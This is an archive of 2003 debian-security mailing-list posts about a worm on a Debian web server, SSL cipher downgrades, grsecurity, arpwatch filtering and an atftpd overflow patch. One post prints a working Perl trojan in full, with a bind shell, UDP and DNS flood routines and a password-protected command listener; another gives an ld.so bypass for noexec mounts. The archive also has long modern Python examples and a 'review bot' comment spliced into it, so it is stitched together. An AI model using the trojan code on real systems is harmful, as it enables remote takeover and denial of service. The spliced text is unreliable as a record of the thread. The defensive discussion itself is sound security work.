RE: OPENSSL

2003-06-11 Thread Reckhard, Tobias
On Tue, Jun 10, Stefan Neufeind wrote:
> I'm using a 128-bit-cert.

You're using an X.509 certificate. The grade of symmetric encryption
negotiated between browser and web server is (at least in theory)
independent of the certificate.

> But browsers that support less encryption 
> (e.g. IE that comes with WinNT4) can't access my SSL-pages because 
> the encryption doesn't allow degradation.

The original NT shipped with IE2. Are you sure you want people to still use
that?

> Is there any way to solve 
> this prob? Using Apache with an official SSL-cert.
> 
> PS: This just came to my mind when you said "step-up" - cause in my 
> case it would be a "step-down", right?

I could imagine that IE2 has numerous problems with SSL. It could well be
one of the browsers that need to see step-up certificates before they
perform 128-bit symmetric cryptography. But I don't know.

Make sure you've allowed your Apache to use small key sizes first. I
wouldn't use them, but you should be sure that it's not your server that's
refusing to do e.g. 40-bit RC4. Then I'd urge the NT users to apply the
latest service pack and preferably install IE6SP1 plus the Hotfixes that
have been released since.

And then they should install a better browser and use that instead. ;->

Cheers,
Tobias



Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Celso González
On Tue, Jun 10, 2003 at 02:58:27PM -0500, Robert Ebright wrote:
> Hello,
> I logged in to my server today to find that
> /usr/sbin/ncsd was running about 50 copies,
> since I don't have BIND installed, obviously
> something was up...they were also running with
> the user www-data...
> After a little bit of research I found a new
> crontab entry
> File: /tmp/crontab.LYukbF
> 0 * * * * /tmp/.nscdrecover

Hi

I don't have any information about your trojan, but I can give you a 
solution (also a good security practice)

Mount /tmp in a separate partition with the noexec flag in fstab

This will disable most of the trojans

Best regards

-- 
Celso González 
http://bulmalug.net




Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Giacomo Mulas
On Wed, 11 Jun 2003, Celso González wrote:

> I don't have any information about your trojan, but I can give you a
> solution (also a good security practice)
>
> Mount /tmp in a separate partition with the noexec flag in fstab
>
> This will disable most of the trojans

Sorry to delude you, but browse the archives: you will find that even with
a noexec partition you can run any executable by just invoking

/lib/ld.so /tmp/yourexecutable

Bye
Giacomo

-- 
_

Giacomo Mulas <[EMAIL PROTECTED]>
_

OSSERVATORIO ASTRONOMICO DI CAGLIARI
Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA)

Tel. (OAC): +39 070 71180 248 Fax : +39 070 71180 222
Tel. (UNICA): +39 070 675 4916
_

"When the storms are raging around you, stay right where you are"
 (Freddy Mercury)
_



RE: OPENSSL

2003-06-11 Thread Stefan Neufeind
On 11 Jun 2003 at 6:59, Reckhard, Tobias wrote:

> On Tue, Jun 10, Stefan Neufeind wrote:
> > I'm using a 128-bit-cert.
> 
> You're using an X.509 certificate. The grade of symmetric encryption
> negotiated between browser and web server is (at least in theory)
> independent of the certificate.
> 
> > But browsers that support less encryption 
> > (e.g. IE that comes with WinNT4) can't access my SSL-pages because
> > the encryption doesn't allow degradation.
> 
> The original NT shipped with IE2. Are you sure you want people to
> still use that?

Well, some people here still use it. Mainly for reading emails via 
webmail ... Users with original NT4 or some version of Mac OS are 
currently having problems accessing the webmail-interface. But I 
don't want to drop to http-without-SSL for webmail. And I can't 
install new browser versions on those machines since I don't 
administrate them. So for now these users can't view their emails 
from those machines.

> > Is there any way to solve 
> > this prob? Using Apache with an official SSL-cert.
> > 
> > PS: This just came to my mind when you said "step-up" - cause in my
> > case it would be a "step-down", right?
> 
> I could imagine that IE2 has numerous problems with SSL. It could well
> be one of the browsers that need to see step-up certificates before
> they perform 128-bit symmetric cryptography. But I don't know.
> 
> Make sure you've allowed your Apache to use small key sizes first. I
> wouldn't use them, but you should be sure that it's not your server
> that's refusing to do e.g. 40-bit RC4. Then I'd urge the NT users to
> apply the latest service pack and preferably install IE6SP1 plus the
> Hotfixes that have been released since.

Will have a look at that. Funny thing: Users can view the first page 
(login-page) but afterwards can't login. Maybe it has got something 
to do with keepalives or anything?!?

> And then they should install a better browser and use that instead.
> ;->

Read statement above. Would REALLY like to do that if I could.



Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Phillip Hofmeister

On Wed, 11 Jun 2003 at 10:47:49AM +0200, Giacomo Mulas wrote:
> On Wed, 11 Jun 2003, Celso González wrote:
> 
> > I don't have any information about your trojan, but I can give you a
> > solution (also a good security practice)
> >
> > Mount /tmp in a separate partition with the noexec flag in fstab
> >
> > This will disable most of the trojans
> 
> Sorry to delude you, but browse the archives: you will find that even with
> a noexec partition you can run any executable by just invoking
> 
> /lib/ld.so /tmp/yourexecutable

While I agree with your observation I feel compelled to defend his
point.

He said mounting /tmp will stop MOST Trojans.  While it might not stop a
trojan planted by a person, it will stop a trojan planted by a worm
(which is what this thread is about) since the author of the worm might
not have had the insight to use ld.so.

Take care,

-- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
--
Excuse #66: Unoptimized hard drive 


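Celso's noexec /tmp advice, and Phillip's point that it still stops the class of worm that simply drops and runs a file, suggest a quick configuration check. The following is an added example, not code from the thread: it reads /proc/mounts-format text and reports which of noexec, nosuid and nodev are missing on the scratch filesystems, and flags a /tmp that is not a separate filesystem at all. The WANTED table, the function names and the sample /proc/mounts content are constructed for this example.

```python
"""Audit scratch mount points for the noexec/nosuid/nodev options.

Added example, not code from the thread. It reads text in /proc/mounts
format (device, mount point, fstype, options, dump, pass; spaces in paths
appear as octal escapes such as \\040) and reports, per mount point, which
hardening options are missing. A mount point that is not a filesystem of
its own (e.g. /tmp living on /) is reported with everything missing, since
it cannot carry options of its own. As the thread notes, noexec on /tmp is
a partial mitigation: it stops the dropper that simply runs /tmp/foo.
"""
import re
from typing import Dict, Optional, Set

# Options wanted on the world-writable scratch filesystems (constructed table).
WANTED: Dict[str, Set[str]] = {
    "/tmp": {"noexec", "nosuid", "nodev"},
    "/var/tmp": {"noexec", "nosuid", "nodev"},
    "/dev/shm": {"noexec", "nosuid", "nodev"},
}

_OCTAL = re.compile(r"\\([0-7]{3})")


def unescape_mount_path(raw: str) -> str:
    """Decode the octal escapes /proc/mounts uses for space, tab, newline and backslash."""
    return _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), raw)


def parse_proc_mounts(text: str) -> Dict[str, Set[str]]:
    """Return {mount_point: set(options)}; a later mount over the same point wins."""
    mounts: Dict[str, Set[str]] = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # blank or malformed line
        mounts[unescape_mount_path(fields[1])] = set(fields[3].split(","))
    return mounts


def audit_mounts(proc_mounts_text: str,
                 wanted: Optional[Dict[str, Set[str]]] = None) -> Dict[str, Set[str]]:
    """Map each wanted mount point to the hardening options it lacks (empty dict = clean)."""
    wanted = WANTED if wanted is None else wanted
    mounts = parse_proc_mounts(proc_mounts_text)
    findings: Dict[str, Set[str]] = {}
    for mount_point, options in wanted.items():
        if mount_point not in mounts:
            findings[mount_point] = set(options)  # not a separate filesystem at all
            continue
        missing = options - mounts[mount_point]
        if missing:
            findings[mount_point] = missing
    return findings


# Constructed sample: /tmp was split off but only given nosuid,nodev; /var/tmp
# was left on the root filesystem; a mount point with a space tests unescaping.
SAMPLE_PROC_MOUNTS = """\
/dev/sda1 / ext3 rw,errors=remount-ro 0 0
/dev/sda3 /tmp ext3 rw,nosuid,nodev 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
/dev/sdb1 /mnt/backup\\040disk ext3 rw 0 0
"""
# The fstab line that would clear the /tmp finding above:
#   /dev/sda3  /tmp  ext3  defaults,noexec,nosuid,nodev  0  2

if __name__ == "__main__":
    for mp, missing in sorted(audit_mounts(SAMPLE_PROC_MOUNTS).items()):
        print(f"{mp}: missing {','.join(sorted(missing))}")
```

Feed it the real file with `audit_mounts(open("/proc/mounts").read())` to check a live box; remember that options only take effect after a remount.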


Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Giacomo Mulas
On Wed, 11 Jun 2003, Phillip Hofmeister wrote:

> While I agree with your observation I feel compelled to defend his
> point.
>
> He said mounting /tmp will stop MOST Trojans.  While it might not stop a
> trojan planted by a person, it will stop a trojan planted by a worm
> (which is what this thread is about) since the author of the worm might
> not have had the insight to use ld.so.

I see what you mean, in this sense he is obviously right.

Bye
Giacomo

-- 
_

Giacomo Mulas <[EMAIL PROTECTED]>
_

OSSERVATORIO ASTRONOMICO DI CAGLIARI
Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA)

Tel. (OAC): +39 070 71180 248 Fax : +39 070 71180 222
Tel. (UNICA): +39 070 675 4916
_

"When the storms are raging around you, stay right where you are"
 (Freddy Mercury)
_



RE: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread DEFFONTAINES Vincent
> While I agree with your observation I feel compelled to 
> defend his point.
> 
> He said mounting /tmp will stop MOST Trojans.  While it might 
> not stop a trojan planted by a person, it will stop a trojan 
> planted by a worm (which is what this thread is about) since 
> the author of the worm might not have had the insight to use ld.so.
> 

A good solution, not too hard to implement, is to patch your kernel with
grsecurity. Grsecurity provides a very good level of protection against
buffer overflow attacks; it randomizes PIDs, protects chroots, enforces the
TCP/IP stack, etc.

Grsecurity is actually a cumulative patch from PaX, some OpenBSD TCP/IP
stuff ported into Linux, Openwall and HAP-linux.

Btw, it is very configurable and pretty well documented at configuration
level.

I use it and am very happy with it. If I trust archives from this list, I am
not the only one in this case :-)

http://www.grsecurity.net



Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Victor Calzado Mayo

Hi

On Tuesday 10 June 2003 21:58, Robert Ebright wrote:

Have you copied the home directory of the user www-data to the new server?
In Debian it is located in the root directory of the web server, so if you have 
copied the document root from the old server you have copied all the dot files for 
the user, and quite possibly the crontab file of www-data as well.

If you look at the syslog entries you can figure out how the worm replicates itself 
and how the rootkit is enabled (only guessing)


> and under SYSLOG it starts
>
the system finds a crontab for the user www-data

user www-data has executed the command crontab -l

> syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)

and has replaced the file

> syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)

hummm, maybe he isn't very smart, www-data has done it again

> syslog.3:Jun  6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)
> syslog.3:Jun  6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)

cron sees the new crontab file for www-data, reads the file, and executes the 
commands...

> syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)

hummm, you have to figure out how /tmp/.nscdrecover has been 
copied; it is difficult to say, but maybe another crontab entry of the 
user www-data starts the work... who knows...


> so I found /tmp/.ncsdrecover and it looks like
> some kind of port scanner/trojan
>

it sounds like a local exploit against nscd which is trying to get a root 
shell and put it on the wire


> the contents are pasted below
>
>
> #!/usr/bin/perl -w
>
> $pass = "J9YcGEyNypkzI";
> $str = 'Mess with the best - die like a
> rest!'x1337;
> use IO::Socket;
> use IO::Select;
> use POSIX;
>
> sub redir
> {
> my $port = shift;
> my $dest = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> $sa = IO::Socket::INET->new( Proto => "tcp",
> Listen => 1, ReuseAddr => 1,
> LocalPort =>$port) or exit;
> $sin = $sa->accept or exit;
> close($sa);
> alarm 0;
> $sout = IO::Socket::INET->new( Proto => "tcp",
> PeerAddr => $dest) or exit;$sin->autoflush(1);
> $sout->autoflush(1);
> $sel = IO::Select->new($sin, $sout);
> while(@sock = $sel->can_read(180)) {
> foreach $s(@sock) {
> $buf = <$s>; exit unless($buf);
> print $sout $buf if($s eq $sin);
> print $sin $buf if($s eq $sout);
> }}}
>
> sub shell
> {
> my $port = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> use Socket;
> socket(S, PF_INET, SOCK_STREAM, 0);
> setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
> bind(S, sockaddr_in($port, INADDR_ANY));
> listen(S, 1);
> accept(X, S);
> close(S);
> alarm 0;
> open STDIN, "<&X";
> open STDOUT, ">&X";
> open STDERR, ">&X";
> close X;
> exec("/bin/sh");
> }
>
> sub udp
> {
> my $host = shift;
> my $time = shift;
> $sock = IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $host,
> PeerPort => int(rand 65535))
> or exit;
> $sock->autoflush(1);$SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> print $sock $str while(1);
> }
> }
>
> sub ddns
> {
> my $host = shift;
> my $time = shift;
> $sock = new IO::Socket::INET->new(Proto
> => 'udp', PeerAddr => $host,
> PeerPort => 53) or exit;
> $sock->autoflush(1);
> $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> while(1) {
> my $s = int(rand(89)+10);
> my $r1 = int(rand(89)+10);
> my $r2 = int(rand(89)+10);
> my $r3 = int(rand(89)+10);
> my $r4 = int(rand(89)+10);
> 
> send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3
>\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
>
> $0 = '/usr/sbin/nscd'.' 'x100;
> exit if fork;
> $SIG{ALRM} = 'IGNORE';
> $SIG{TERM} = 'IGNORE';
> $SIG{CHLD} = 'IGNORE';
> $SIG{INT} = 'IGNORE';
> $SIG{QUIT} = 'IGNORE';
> $SIG{HUP} = 'IGNORE';
> open STDIN, " open STDOUT, ">/dev/null";
> open STDERR, ">/dev/null";
> POSIX::setsid();
>
> $csock = IO::Socket::INET->new(Proto => 'udp',
> LocalPort => 1337, ReuseAddr => 1) or
> exit;while($string =<$csock>)
> {
> chop($string);
> my ($pw, $cmd, $arg1, $arg2) = split "
> ", $string;next unless($cmd);
> next unless($arg1);
> next unless(crypt($pw, $pass) eq $pass);
> if ($cmd eq "ping") {
> my $bsock =
> IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $arg1,
>   PeerPort => $arg2,
> ReuseAddr => 1) or
> next;
> print $bsock"pong
> ".`uname -mnrs`; close $bsock;
> 
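Victor's reading of the syslog excerpt (crontab LIST/REPLACE by www-data, then CRON running /tmp/.nscdrecover) is easy to turn into a detection. The following is an added example, not code from the thread: the rule names, the SERVICE_ACCOUNTS set and the sample lines (modelled on the ones quoted above, with two benign control lines) are constructed here.

```python
"""Flag crontab tampering by service accounts and cron jobs run from /tmp.

Added example, not code from the thread. It parses Debian syslog lines of
the shape quoted in the post (crontab(1)'s LIST/REPLACE audit lines and
/USR/SBIN/CRON's CMD lines) and reports the two things the post walks
through: a service account replacing its own crontab, and cron executing a
hidden file out of a scratch directory. Sample lines below are constructed,
modelled on the ones in the thread.
"""
import re
from collections import namedtuple
from typing import Iterable, List, Optional, Tuple

# Accounts that should never edit a crontab; www-data is the one in the thread.
SERVICE_ACCOUNTS = frozenset({"www-data", "nobody", "daemon", "mail", "news", "proxy"})
# World-writable places a dropper can write to without any privilege.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Syslog line; an optional "syslog.3:" grep filename prefix is accepted and ignored.
_SYSLOG = re.compile(
    r"^(?:[^\s:]+:)?(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<prog>[^\[\s]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
# crontab(1) audit message: "(actor) ACTION (owner of the crontab)"
_CRONTAB = re.compile(r"^\((?P<actor>[^)]+)\) (?P<action>[A-Z ]+) \((?P<target>[^)]+)\)$")
# cron daemon job start: "(user) CMD (command line)"
_CRON_CMD = re.compile(r"^\((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")

Finding = namedtuple("Finding", "timestamp rule user detail")


def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (timestamp, program, message) or None for a non-syslog line."""
    m = _SYSLOG.match(line.strip())
    if not m:
        return None
    return m.group("ts"), m.group("prog"), m.group("msg")


def suspicious_command(cmd: str) -> bool:
    """True if the job's executable lives in a scratch dir or is a dotfile."""
    tokens = cmd.strip().split()
    if not tokens:
        return False
    exe = tokens[0]
    basename = exe.rsplit("/", 1)[-1]
    hidden = basename.startswith(".") and basename not in (".", "..")
    return exe.startswith(SCRATCH_DIRS) or hidden


def analyse(lines: Iterable[str]) -> List[Finding]:
    """Run both detections over syslog lines, in file order."""
    findings: List[Finding] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, prog, msg = parsed
        if prog == "crontab":
            m = _CRONTAB.match(msg)
            if m and m.group("action") == "REPLACE" and m.group("target") in SERVICE_ACCOUNTS:
                findings.append(Finding(ts, "service-account-crontab-replace",
                                        m.group("target"), "replaced by " + m.group("actor")))
        elif prog.upper().endswith("CRON"):
            m = _CRON_CMD.match(msg)
            if m and suspicious_command(m.group("cmd")):
                findings.append(Finding(ts, "cron-job-from-scratch-or-hidden-path",
                                        m.group("user"), m.group("cmd").strip()))
    return findings


# Constructed sample modelled on the thread's excerpt, plus two benign lines
# (a user editing their own crontab, root's hourly run-parts) as controls.
SAMPLE_SYSLOG = """\
syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)
syslog.3:Jun  6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)
syslog.3:Jun  6 16:45:02 debian crontab[26830]: (alice) REPLACE (alice)
syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)
syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26938]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
"""

if __name__ == "__main__":
    for f in analyse(SAMPLE_SYSLOG.splitlines()):
        print(f"{f.timestamp}  {f.rule:40s} user={f.user}  {f.detail}")
```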

2.5 and grsec [was Re: a weird script worm uploaded via php with debian 3.0 ?]

2003-06-11 Thread Dale Amon
On Wed, Jun 11, 2003 at 03:24:11PM +0200, DEFFONTAINES Vincent wrote:
> I use it and am very happy with it. If I trust archives from this list, I am
> not 
> the only one in this case :-)

Is anyone using it with 2.5? I'm on the cusp of switching a
few machines to it to get up the learning curve before 2.6
comes to pass.

I would not think a 2.4 patchset would have much chance of
working against it...



arpwatch exclusion ?

2003-06-11 Thread Jacques Foury

Hello all.

I am using arpwatch, but I use a few machines with 2 ethernet cards, and 
they often flip-flop... As I know them, I want to exclude the flip-flop 
mails from my mailbox...


How could I tune arpwatch so that it does not listen to those 
flip-flops, or it does not send mails for these ?


Thank you !

--
Jacques Foury





Re: arpwatch exclusion ?

2003-06-11 Thread Chatchai JANTARAPRIM
On Wed, 11 Jun 2003, Jacques Foury wrote:

> Date: Wed, 11 Jun 2003 17:50:14 +0200
> From: Jacques Foury <[EMAIL PROTECTED]>
> To: debian-security@lists.debian.org
> Subject: arpwatch exclusion ?
> Resent-Date: Wed, 11 Jun 2003 11:10:48 -0500 (CDT)
> Resent-From: debian-security@lists.debian.org
> 
> Hello all.
> 
> I am using arpwatch, but I use a few machines with 2 ethernet cards, and 
> they often flip-flop... As I know them, I want to exclude the flip-flop 
> mails from my mailbox...
> 
> How could I tune arpwatch so that it does not listen to those 
> flip-flops, or it does not send mails for these ?

Well, you will have almost the same mail content/header sent from
arpwatch. So why not use your mail filter to filter out this kind
of mail? No need to fix arpwatch, it is supposed to work that way.

cj
> 
> Thank you !
> 
> -- 
> Jacques Foury
> 
> 
> 
> 



Re: apache

2003-06-11 Thread Glen Mehn

Martynas Domarkas wrote:

> Yes, of course. But in this case I will invoke rotatelogs... I don't
> like it.

Martynas:

three people now have given you advice on how to fix your "problem" 
three different ways. Apache doesn't have this behaviour: in fact, the 
apache foundation suggests you use cronolog:


http://httpd.apache.org/docs/logs.html#piped

If you don't like this behaviour, take it up on the apache lists, 
although it's been discussed before.


glen
--
Glen Mehn   [EMAIL PROTECTED]
"if you ever swallow the universe, remember to spit the dragon
back out.xx.--swan



Re: kernel-source 2.4.20 + grsecurity + freeswan

2003-06-11 Thread simon raven
On Thu, Jun 05, 2003 at 21:50:33 -0400, Hubert Chan wrote:
> > "Vinai" == Vinai Kopp <[EMAIL PROTECTED]> writes:
> 
> [...]
> 
> Vinai> There seem to be problems using both the grsecurity and the
> Vinai> freeswan patches (at least I haven't been successful applying
> Vinai> the patches - I tried the debian versions and the "official" ones
> Vinai> from the different project sites of the patches and the kernel
> Vinai> sources).
> 
> I have a Debian/sid machine running a 2.4.20 kernel with both patches
> applied (along with a whole bunch of other patches), and had no problems
> applying the patches.  The patches and kernel sources I got from the sid
> repository maybe about a month ago.  I would imagine that there
> shouldn't be much of an issue using the patches and kernel sources from
> sid on a stable box.

do you happen to have XFS patched onto that kernel? :) and what was the
order of the patching? 

eric
(infrequent poster)

> -- 
> Hubert Chan <[EMAIL PROTECTED]> - http://www.uhoreg.ca/
> PGP/GnuPG key: 1024D/124B61FA
> Fingerprint: 96C5 012F 5F74 A5F7 1FF7  5291 AF29 C719 124B 61FA
> Key available at wwwkeys.pgp.net.   Encrypted e-mail preferred.



-- 
UNIX is user friendly, it's just picky about who its friends are.  
---
 ,''`.   http://www.debian.org/  | http://www.nuit.ca/   
 : :' :  Debian GNU/Linux| http://simonraven.nuit.ca/
 `. `'   | PGP key ID: 6169 BE0C 0891 A038
  `- | 



Re: arpwatch exclusion ?

2003-06-11 Thread Blars Blarson
In article <[EMAIL PROTECTED]> 
[EMAIL PROTECTED] writes:
>I am using arpwatch, but I use a few machines with 2 ethernet cards, and 
>they often flip-flop... As I know them, I want to exclude the flip-flop 
>mails from my mailbox...
>
>How could I tune arpwatch so that it does not listen to those 
>flip-flops, or it does not send mails for these ?

Use the "-s program" option to send the "mail" via a program that does
whatever filtering you want.  I'm filtering out the proxy-arp responses
this way.  (There are hundreds of them every day on my firewall.)

Unless you know all flip-flops will be noise, I'd recommend only filtering
the ones you know about.

-- 
Blars Blarson   [EMAIL PROTECTED]
http://www.blars.org/blars.html
"Text is a way we cheat time." -- Patrick Nielsen Hayden

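Chatchai suggests filtering the mail and Blars suggests doing it in the program that arpwatch's "-s program" option hands the report to, filtering only the flip-flops you know about. The following is an added example of such a filter, not arpwatch's code: it forwards every report to sendmail except a flip flop between the two MACs listed for a known dual-homed host. The report layout (Subject "flip flop", "ip address", "ethernet address" and "old ethernet address" fields), the KNOWN_DUAL_HOMED table and the sample messages are assumptions constructed for the example.

```python
"""Filter for arpwatch reports: drop flip-flop mails only for known dual-NIC hosts.

Added example, not arpwatch's code. Meant to be the program named by
arpwatch's -s option (as suggested in the post): it reads the report mail,
headers included, on stdin and either hands it unchanged to sendmail or
drops it. Only a "flip flop" between the two MAC addresses registered for a
known host is dropped; a third MAC showing up for that IP, or any other
report type, is always delivered. The report layout is modelled on
arpwatch's report and is an assumption here; the parser tolerates
differences in spacing and case.
"""
import re
import subprocess
import sys
from typing import Dict, Optional, Set

# Constructed: IPs of our dual-homed machines and the MACs they alternate between.
KNOWN_DUAL_HOMED: Dict[str, Set[str]] = {
    "192.168.1.10": {"00:11:22:33:44:55", "00:11:22:33:44:66"},
}

# "key: value" lines, both mail headers and the report body's aligned fields.
_FIELD = re.compile(r"^\s*(?P<key>[a-z][a-z ]*?)\s*:\s*(?P<value>.*?)\s*$", re.IGNORECASE)


def normalize_mac(mac: str) -> Optional[str]:
    """Zero-pad arpwatch's unpadded form (0:1:2:3:4:5) to 00:01:02:03:04:05."""
    parts = mac.strip().lower().split(":")
    if len(parts) != 6:
        return None
    if not all(1 <= len(p) <= 2 and all(c in "0123456789abcdef" for c in p) for p in parts):
        return None
    return ":".join(p.zfill(2) for p in parts)


def parse_report(text: str) -> Dict[str, str]:
    """Collect the report's 'key: value' lines into a dict keyed by lowercase name."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            fields.setdefault(m.group("key").lower(), m.group("value"))
    return fields


def should_forward(text: str, known: Dict[str, Set[str]] = KNOWN_DUAL_HOMED) -> bool:
    """Return False only for a flip flop between the registered MACs of a known host."""
    fields = parse_report(text)
    title = fields.get("subject", "").split("(", 1)[0].strip().lower()
    if title != "flip flop":
        return True      # new station, changed ethernet address, etc. always go through
    allowed = known.get(fields.get("ip address", "").strip())
    if not allowed:
        return True      # flip flop on a host nobody vouched for
    new_mac = normalize_mac(fields.get("ethernet address", ""))
    old_mac = normalize_mac(fields.get("old ethernet address", ""))
    if new_mac is None or old_mac is None:
        return True      # unparsable report: fail open and deliver it
    return not (new_mac in allowed and old_mac in allowed)


# Constructed sample reports in the assumed arpwatch layout.
SAMPLE_KNOWN_FLIP_FLOP = """\
From: arpwatch
To: root
Subject: flip flop (gateway.example.net)

            hostname: gateway.example.net
          ip address: 192.168.1.10
    ethernet address: 0:11:22:33:44:66
     ethernet vendor: <unknown>
old ethernet address: 0:11:22:33:44:55
 old ethernet vendor: <unknown>
           timestamp: Wednesday, June 11, 2003 17:50:14 +0200
  previous timestamp: Wednesday, June 11, 2003 17:49:58 +0200
               delta: 16 seconds
"""
# Same host, but the new MAC is not one of its two cards: must be delivered.
SAMPLE_UNKNOWN_MAC = SAMPLE_KNOWN_FLIP_FLOP.replace("0:11:22:33:44:66", "0:de:ad:be:ef:1")
SAMPLE_NEW_STATION = """\
From: arpwatch
To: root
Subject: new station (printer.example.net)

            hostname: printer.example.net
          ip address: 192.168.1.77
    ethernet address: 0:aa:bb:cc:dd:ee
"""


def main() -> int:
    report = sys.stdin.read()
    if should_forward(report):
        # Deliver the unchanged message; sendmail -t takes recipients from the headers.
        subprocess.run(["/usr/sbin/sendmail", "-t"], input=report.encode(), check=True)
    return 0


if __name__ == "__main__":
    sys.exit(main())
```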


atftpd vulnerability and patch?

2003-06-11 Thread Drew Scott Daniels
http://packetstorm.linuxsecurity.com/filedesc/atftpdx.c.html says: Proof
of concept remote root exploit for atftpd version 0.6. Makes use of the
filename overflow found by Rick Patel. Related post here. Tested against
Debian 3.0. By gunzip

http://packetstorm.linuxsecurity.com/filedesc/atftpd.patch.html says:
Simple patch to fix the overflow found in atftpd by Rick Patel. By gunzip

The patch is:
--- tftpd_file.cTue Mar 12 05:26:18 2002
+++ tftpd_file_diff.c   Thu Jun  5 20:31:06 2003
@@ -357,7 +357,8 @@
  else
  {
   strcpy(filename, directory);
-  strncat(filename, data->tftp_options[OPT_FILENAME].value, VAL_SIZE);
+  strncat(filename, data->tftp_options[OPT_FILENAME].value,
+   VAL_SIZE - strlen( directory ) - 1 );
  }

  /* If the filename contain /../ sequences, we forbid the access */
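Review bot: the new bound in the `strncat` call assumes `filename` holds exactly VAL_SIZE bytes and that `directory` is shorter than that, and the hunk shows neither; if `strlen(directory)` ever reaches VAL_SIZE - 1 the expression `VAL_SIZE - strlen( directory ) - 1` underflows (it is size_t arithmetic), the limit wraps to a huge value and the concatenation is unbounded again, while the `strcpy(filename, directory)` on the line above stays unchecked. Suggest computing the remaining room from the real buffer size (e.g. `size_t room = sizeof(filename) - strlen(filename) - 1;` if `filename` is an array, otherwise its allocated size), guarded by a check that `directory` itself fits, and rejecting the request rather than silently truncating the client's filename, since a truncated name may resolve to a different file than the one requested.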



http://packages.qa.debian.org/a/atftp.html shows:
[2002-04-24] Accepted atftp 0.6.1.1 (source hppa)
[2002-04-13] Accepted atftp 0.6.1 (i386 source)
[2002-03-31] Accepted atftp 0.6 (i386 source)
[2002-02-11] Installed atftp 0.5 (i386 source)
[2001-07-21] Installed atftp 0.4 (i386 source)
[2001-03-05] Installed atftp 0.3 (i386 source)
[2000-12-27] Installed atftp 0.2 (i386 source)
[2000-08-21] Installed atftp 0.1 (source i386)

and:
Testing 0.6.1.1
Stable 0.6

I'm guessing atftp is vulnerable, but without checking I won't file a bug.
Checking the code should be easy, but checking if this could actually be
exploited would take a bit more thought. If stable is actually vulnerable
and exploitable then the security team should be co-ordinated with.

 Drew Daniels



grsecurity vs lsm vs lids

2003-06-11 Thread Mark Devin


OK, I have been seeing lots of people on this list recommend using the
grsecurity kernel patch.  Now I want to give it a go, but I see that
there is also a lsm patch and I also remember lids being recommended in
the past by others.

I would like to learn the interface to what is going to become the
standard in future kernels.  I read something while googling that
suggested that lsm seems to be the way that the kernel is heading.

What do people on this list recommend?

Regards.
Mark.



Kernel Security Fixes

2003-06-11 Thread Peter Holm
Hi,

just got an announcement from the mandrake security list.

Could please someone of the people with a deeper knowledge explain, if
the mentioned issues are addressed in one of the "stock" debian
kernels or if I have to get the sources from kernel.org and patch it
myself? 



Mandrake Linux Security Update Advisory

Multiple vulnerabilities were discovered and fixed in the Linux
kernel.
 
 * CAN-2003-0001: Multiple ethernet network card drivers do not pad
   frames with null bytes which allows remote attackers to obtain
   information from previous packets or kernel memory by using
   special malformed packets.
 
 * CAN-2003-0244: The route cache implementation in the 2.4 kernel and
   the Netfilter IP conntrack module allows remote attackers to cause a
   Denial of Service (DoS) via CPU consumption due to packets with
   forged source addresses that cause a large number of hash table
   collisions related to the PREROUTING chain.
 
 * CAN-2003-0246: The ioperm implementation in 2.4.20 and earlier
   kernels does not properly restrict privileges, which allows local
   users to gain read or write access to certain I/O ports.
 
 * CAN-2003-0247: A vulnerability in the TTY layer of the 2.4 kernel
   allows attackers to cause a kernel oops resulting in a DoS.
 
 * CAN-2003-0248: The mxcsr code in the 2.4 kernel allows attackers to
   modify CPU state registers via a malformed address.



Thank you very much for your attention!




Have a nice thread,
Peter



Re: Kernel Security Fixes

2003-06-11 Thread Noah Meyerhans
On Thu, Jun 12, 2003 at 01:18:59AM +0200, Peter Holm wrote:
> Could please someone of the people with a deeper knowledge explain, if
> the mentioned issues are addressed in one of the "stock" debian
